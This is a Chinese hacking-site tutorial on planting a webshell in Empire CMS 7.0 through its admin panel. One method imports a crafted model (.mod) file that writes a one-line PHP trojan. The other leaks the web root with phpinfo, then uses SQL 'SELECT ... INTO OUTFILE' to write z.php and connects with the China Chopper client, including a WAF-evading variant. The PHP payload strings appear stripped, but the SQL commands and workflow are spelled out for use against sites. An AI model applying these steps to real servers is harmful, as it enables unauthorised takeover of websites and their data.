帝国cms7.0漏洞可拿shell - 中国木马资源网

作者:admin2016-1-16 14:12分类: 黑客技术,黑客渗透网站文章 标签: 帝国cms程序漏洞

方法一:
系统数据表与系统模型,管理数据表。

再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:

帝国cms后台漏洞.jpg

“导入系统模型”,可进入“LoadInM.php”页面,如图:

cms程序拿shell.jpg

在本地新建一个文件,文本内容为")?> 再命名为phpdama.php.mod,
导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件。
可以从导入系统模型源文件中查看到ecmsmod.php的路径,如图:
上传phpdama.jpg

方法二:
在本地新建一个info.php(任意php文件)其源码内容为,再重名名为info.php.mod 将此文件按照方法一导入!
系统模型,即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:
phpinfo挂马.jpg

接着右键查看源码:

查看源代码.jpg

info.php.mod的源码然后:
系统——备份与恢复数据——执行SQL语句
在执行SQL语句框中输入如下代码:
create table temp (cmd text not null);
insert into temp (cmd) values('');
select cmd from temp into outfile 'c://ecms//z.php';
drop table if exists temp;
即可在网站根目录生成z.php

中国菜刀连接即可!
漏洞证明:
中国菜刀连接shell.jpg

过狗菜刀上传shell.jpg

教程到此结束。

来源:asp大马官网 转载注明出处!

温馨提示如有转载或引用以上内容之必要,敬请将本文链接作为出处标注,谢谢合作!

已有 0/2027 人参与

发表评论:




欢迎使用手机扫描访问本站,还可以关注微信哦~